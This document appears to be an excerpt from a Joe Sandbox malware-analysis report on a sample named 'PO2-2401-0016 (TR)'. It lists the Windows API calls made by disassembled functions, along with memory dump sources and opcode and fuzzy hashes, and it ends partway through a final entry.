                                • Instruction ID: e3f17082091fab33466ab6a96b2a2e448dee293f57cc5e4513a5d86994d9b1a0
                                • Opcode Fuzzy Hash: ac00d48b234ae191ff4e56c95280cddfd7c12fccb12e865502c1375fbe6f4afd
                                • Instruction Fuzzy Hash: 16419C70104340AFD721DF64DC98FBA7BF8EF6A320F040629F9958A2E1C7309996DB61
                                APIs
                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 001C080C
                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001C0847
                                • EnterCriticalSection.KERNEL32(?), ref: 001C0863
                                • LeaveCriticalSection.KERNEL32(?), ref: 001C08DC
                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001C08F3
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 001C0921
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                • String ID:
                                • API String ID: 3368777196-0
                                • Opcode ID: 99173330282fccf7ec9f52e4cecd1e4375b5b3d5f84bf469c7cb8e7c09e4e43a
                                • Instruction ID: 40eefa7bc225ed5c3c96a4aef5b264e3deb351253f720c211d7a5a8b59bb16a6
                                • Opcode Fuzzy Hash: 99173330282fccf7ec9f52e4cecd1e4375b5b3d5f84bf469c7cb8e7c09e4e43a
                                • Instruction Fuzzy Hash: 5C415971900205EFDF15DF94DC85AAA7B78FF18304F1480A9ED049E296DB31DE61DBA0
                                APIs
                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001AF3AB,00000000,?,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 001E824C
                                • EnableWindow.USER32(00000000,00000000), ref: 001E8272
                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001E82D1
                                • ShowWindow.USER32(00000000,00000004), ref: 001E82E5
                                • EnableWindow.USER32(00000000,00000001), ref: 001E830B
                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001E832F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Show$Enable$MessageSend
                                • String ID:
                                • API String ID: 642888154-0
                                • Opcode ID: 5f6f30066f2ed0836497ab1acaa18070f89960b560cc21f93387ad9b6bf64ce7
                                • Instruction ID: cca08732221f6631991a18f305139e08a607bd0108c0290c16858dab09530b92
                                • Opcode Fuzzy Hash: 5f6f30066f2ed0836497ab1acaa18070f89960b560cc21f93387ad9b6bf64ce7
                                • Instruction Fuzzy Hash: 8741B730601A85AFDB25CF56DC99FEC7BF1BB0A714F185165E60C5F262C7329892CB50
                                APIs
                                • IsWindowVisible.USER32(?), ref: 001B4C95
                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001B4CB2
                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001B4CEA
                                • _wcslen.LIBCMT ref: 001B4D08
                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001B4D10
                                • _wcsstr.LIBVCRUNTIME ref: 001B4D1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                • String ID:
                                • API String ID: 72514467-0
                                • Opcode ID: 04ced8e318dfe45b92a2658b9cd308c462ec9bf5cf8c61bd5dc1ee60fdcfa128
                                • Instruction ID: 742ff14f090db849000eaef8a71943afa85fa0da5945b6a5960d49622edf07c3
                                • Opcode Fuzzy Hash: 04ced8e318dfe45b92a2658b9cd308c462ec9bf5cf8c61bd5dc1ee60fdcfa128
                                • Instruction Fuzzy Hash: F821D7726042407BEB155B69AC49EBF7FA8DF59750F11C02DF805CA192DB61DC4196A0
                                APIs
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                • _wcslen.LIBCMT ref: 001C587B
                                • CoInitialize.OLE32(00000000), ref: 001C5995
                                • CoCreateInstance.OLE32(001EFCF8,00000000,00000001,001EFB68,?), ref: 001C59AE
                                • CoUninitialize.OLE32 ref: 001C59CC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                • String ID: .lnk
                                • API String ID: 3172280962-24824748
                                • Opcode ID: 63a2ac4eb045eee8d551f8bc96e8d1394cddc385fe33bbe81a88d39b485360d8
                                • Instruction ID: d60a67b7bd19b24fd414f12727999b67ecb328df10f6bf7501a01f0b5f8f4a22
                                • Opcode Fuzzy Hash: 63a2ac4eb045eee8d551f8bc96e8d1394cddc385fe33bbe81a88d39b485360d8
                                • Instruction Fuzzy Hash: BFD15370608601DFC714DF25C480E2ABBE2EFA9714F14895DF8999B261DB31EC85CB92
                                APIs
                                  • Part of subcall function 001B0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001B0FCA
                                  • Part of subcall function 001B0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001B0FD6
                                  • Part of subcall function 001B0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001B0FE5
                                  • Part of subcall function 001B0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001B0FEC
                                  • Part of subcall function 001B0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001B1002
                                • GetLengthSid.ADVAPI32(?,00000000,001B1335), ref: 001B17AE
                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001B17BA
                                • HeapAlloc.KERNEL32(00000000), ref: 001B17C1
                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 001B17DA
                                • GetProcessHeap.KERNEL32(00000000,00000000,001B1335), ref: 001B17EE
                                • HeapFree.KERNEL32(00000000), ref: 001B17F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                • String ID:
                                • API String ID: 3008561057-0
                                • Opcode ID: d529cdcaea8919bbba34e8a3e708cb6df7df20d351e1be0a536e471bcb4253ca
                                • Instruction ID: 9bdba7d5ed79effe2f19decd985b90da71ac4154b65a8dae48d3fded57f53bca
                                • Opcode Fuzzy Hash: d529cdcaea8919bbba34e8a3e708cb6df7df20d351e1be0a536e471bcb4253ca
                                • Instruction Fuzzy Hash: 63118E32610205FFDB14DFA4CC99BEF7BA9EB46355F514018F8419B210DB35A985CBA0
                                APIs
                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001B14FF
                                • OpenProcessToken.ADVAPI32(00000000), ref: 001B1506
                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001B1515
                                • CloseHandle.KERNEL32(00000004), ref: 001B1520
                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001B154F
                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 001B1563
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                • String ID:
                                • API String ID: 1413079979-0
                                • Opcode ID: 13078e0fb678091ec4689d2016869440b71f2c6a7601e65975d610e4f2c178bf
                                • Instruction ID: 9fd0c342ae758b208084461b0f4f77411ebec2354e7fd8ba1775e9e794bc42df
                                • Opcode Fuzzy Hash: 13078e0fb678091ec4689d2016869440b71f2c6a7601e65975d610e4f2c178bf
                                • Instruction Fuzzy Hash: 6C111472504249BBDB11CFA8ED89BDE7BA9EB49744F054025FA05A6060C3758EA19BA0
                                APIs
                                • GetLastError.KERNEL32(?,?,00173379,00172FE5), ref: 00173390
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0017339E
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001733B7
                                • SetLastError.KERNEL32(00000000,?,00173379,00172FE5), ref: 00173409
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: b55a5c0d925f17749a36728666d282305d6c6b1ec187900830d63f2cad850031
                                • Instruction ID: 89c7aa992c07e4f2d5d8f5472a7b7dc0ee6c9981b0f26c1bfde835c32abed7be
                                • Opcode Fuzzy Hash: b55a5c0d925f17749a36728666d282305d6c6b1ec187900830d63f2cad850031
                                • Instruction Fuzzy Hash: 5E01FC33649311BFA62927B57CC95A72A75FB29379730C229F538851F0EF114E017654
                                APIs
                                • GetLastError.KERNEL32(?,?,00185686,00193CD6,?,00000000,?,00185B6A,?,?,?,?,?,0017E6D1,?,00218A48), ref: 00182D78
                                • _free.LIBCMT ref: 00182DAB
                                • _free.LIBCMT ref: 00182DD3
                                • SetLastError.KERNEL32(00000000,?,?,?,?,0017E6D1,?,00218A48,00000010,00154F4A,?,?,00000000,00193CD6), ref: 00182DE0
                                • SetLastError.KERNEL32(00000000,?,?,?,?,0017E6D1,?,00218A48,00000010,00154F4A,?,?,00000000,00193CD6), ref: 00182DEC
                                • _abort.LIBCMT ref: 00182DF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 732914827ea0b020e70616f0097c1712b017bfc59f0676c7a5c677014eec9bed
                                • Instruction ID: 06ce1f5bb1f56df62892971ed08033989545e869672a7a90e9e54b7da99d5976
                                • Opcode Fuzzy Hash: 732914827ea0b020e70616f0097c1712b017bfc59f0676c7a5c677014eec9bed
                                • Instruction Fuzzy Hash: 79F0C83664561037C61337B8BC0AE5F295ABFE27A1F254618F824972D2EF349B425F60
                                APIs
                                  • Part of subcall function 00169639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00169693
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696A2
                                  • Part of subcall function 00169639: BeginPath.GDI32(?), ref: 001696B9
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696E2
                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001E8A4E
                                • LineTo.GDI32(?,00000003,00000000), ref: 001E8A62
                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001E8A70
                                • LineTo.GDI32(?,00000000,00000003), ref: 001E8A80
                                • EndPath.GDI32(?), ref: 001E8A90
                                • StrokePath.GDI32(?), ref: 001E8AA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                • String ID:
                                • API String ID: 43455801-0
                                • Opcode ID: 5af7783120f87bfc5e09a2d44b479914eb499d7e4c244e4242c019e68754f018
                                • Instruction ID: eeb7f5a6344fb4375fe8bca76424d5e19332916df040813432f6a0332e282022
                                • Opcode Fuzzy Hash: 5af7783120f87bfc5e09a2d44b479914eb499d7e4c244e4242c019e68754f018
                                • Instruction Fuzzy Hash: 6B11FA7600018CFFDF129F90DC88E9A7F6CEB04354F048021FA199A161C7719D96DFA0
                                APIs
                                • GetDC.USER32(00000000), ref: 001B5218
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 001B5229
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B5230
                                • ReleaseDC.USER32(00000000,00000000), ref: 001B5238
                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 001B524F
                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 001B5261
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: e510246554c4b1418858a633d4e769a26d89ed7a70a0326823cd3c7e72d21dcf
                                • Instruction ID: a92306d1311c1b2ddf1f1949c95f44c5d1bd7ad9d0cfa792bbf260d037287369
                                • Opcode Fuzzy Hash: e510246554c4b1418858a633d4e769a26d89ed7a70a0326823cd3c7e72d21dcf
                                • Instruction Fuzzy Hash: 56014F75A01758BBEB109BE59C89B5EBFB9EB48751F044065FA04AB681D7709801CBA0
                                APIs
                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00151BF4
                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00151BFC
                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00151C07
                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00151C12
                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00151C1A
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00151C22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Virtual
                                • String ID:
                                • API String ID: 4278518827-0
                                • Opcode ID: 444314952d53945dd294172417cb2fb18c8b4022d8512ac8f28cdbf4b0f084c4
                                • Instruction ID: 9449716f2269e0a604b0a56bf2ae3351ee80d5c4276e1efa883046dac3c74053
                                • Opcode Fuzzy Hash: 444314952d53945dd294172417cb2fb18c8b4022d8512ac8f28cdbf4b0f084c4
                                • Instruction Fuzzy Hash: 950148B09027597DE3008F5A8C85A56FFA8FF19354F04411B915C4BA41C7B5A864CBE5
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001BEB30
                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001BEB46
                                • GetWindowThreadProcessId.USER32(?,?), ref: 001BEB55
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001BEB64
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001BEB6E
                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001BEB75
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                • String ID:
                                • API String ID: 839392675-0
                                • Opcode ID: 90f1e167e3778356be1f20d07af77b06a633e7c8ffac300ac057b837ddc04efc
                                • Instruction ID: 03cee1823f82090a5c5afe3b0c74c039e346dcc77282acf413ae6adfe08b9561
                                • Opcode Fuzzy Hash: 90f1e167e3778356be1f20d07af77b06a633e7c8ffac300ac057b837ddc04efc
                                • Instruction Fuzzy Hash: E9F03072140198BBE72157929C4DEEF3A7CEFCAB11F000158FA01D5591D7A05A42C6F5
                                APIs
                                • GetClientRect.USER32(?), ref: 001A7452
                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 001A7469
                                • GetWindowDC.USER32(?), ref: 001A7475
                                • GetPixel.GDI32(00000000,?,?), ref: 001A7484
                                • ReleaseDC.USER32(?,00000000), ref: 001A7496
                                • GetSysColor.USER32(00000005), ref: 001A74B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                • String ID:
                                • API String ID: 272304278-0
                                • Opcode ID: 1dd899051d4d56dabb49643fdd02a47a7a83219362e87867ca21e9a0695880b8
                                • Instruction ID: 21c2492fb191562cf68c09642062bb26093381affaf7d2154fb6c6b33d76eeba
                                • Opcode Fuzzy Hash: 1dd899051d4d56dabb49643fdd02a47a7a83219362e87867ca21e9a0695880b8
                                • Instruction Fuzzy Hash: 9B018B31500255EFDB105FA4DC48BEEBBB6FF48311F110064F926A65A0CB311E92AB90
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001B187F
                                • UnloadUserProfile.USERENV(?,?), ref: 001B188B
                                • CloseHandle.KERNEL32(?), ref: 001B1894
                                • CloseHandle.KERNEL32(?), ref: 001B189C
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 001B18A5
                                • HeapFree.KERNEL32(00000000), ref: 001B18AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                • String ID:
                                • API String ID: 146765662-0
                                • Opcode ID: ec06589542ab737535113294c191bfa64577150a24cffe8e71841a4fb023e7e6
                                • Instruction ID: be25b518466eaa1fdf5bf89df514c9f5f956db2d9e383008f828890ecafd2c38
                                • Opcode Fuzzy Hash: ec06589542ab737535113294c191bfa64577150a24cffe8e71841a4fb023e7e6
                                • Instruction Fuzzy Hash: 14E0E536004241FBDB015FE1ED4C90EBF39FF4AB22B108220F62589870CB3294A2DF90
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0015BEB3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: D%"$D%"$D%"$D%"D%"
                                • API String ID: 1385522511-2824579510
                                • Opcode ID: adda9341f65259f804ef7e67853dc30e166aad948748640bf68615323035af01
                                • Instruction ID: 25f4e7b776448bdbb4891d8ed75c567522f66192cd249da84d1df6a27f3a6db5
                                • Opcode Fuzzy Hash: adda9341f65259f804ef7e67853dc30e166aad948748640bf68615323035af01
                                • Instruction Fuzzy Hash: 85916A75A0820ADFCB18CF98C0D16A9B7F1FF58315F248169E965AB350E731ED89CB90
                                APIs
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001BC6EE
                                • _wcslen.LIBCMT ref: 001BC735
                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001BC79C
                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001BC7CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ItemMenu$Info_wcslen$Default
                                • String ID: 0
                                • API String ID: 1227352736-4108050209
                                • Opcode ID: b8dcf905cb1005389141055647ffecb557585f42f1bb42c5db97e0108de04084
                                • Instruction ID: ce6e03d37aafc10d1c07db169108cfe29392bfab8b7c8360c9daa3319b160de5
                                • Opcode Fuzzy Hash: b8dcf905cb1005389141055647ffecb557585f42f1bb42c5db97e0108de04084
                                • Instruction Fuzzy Hash: 6251FF726043019BD714DF68C885BEBB7E8AFA9310F040A2DF9A5D72A0DB70D814CBD2
                                APIs
                                • ShellExecuteExW.SHELL32(0000003C), ref: 001DAEA3
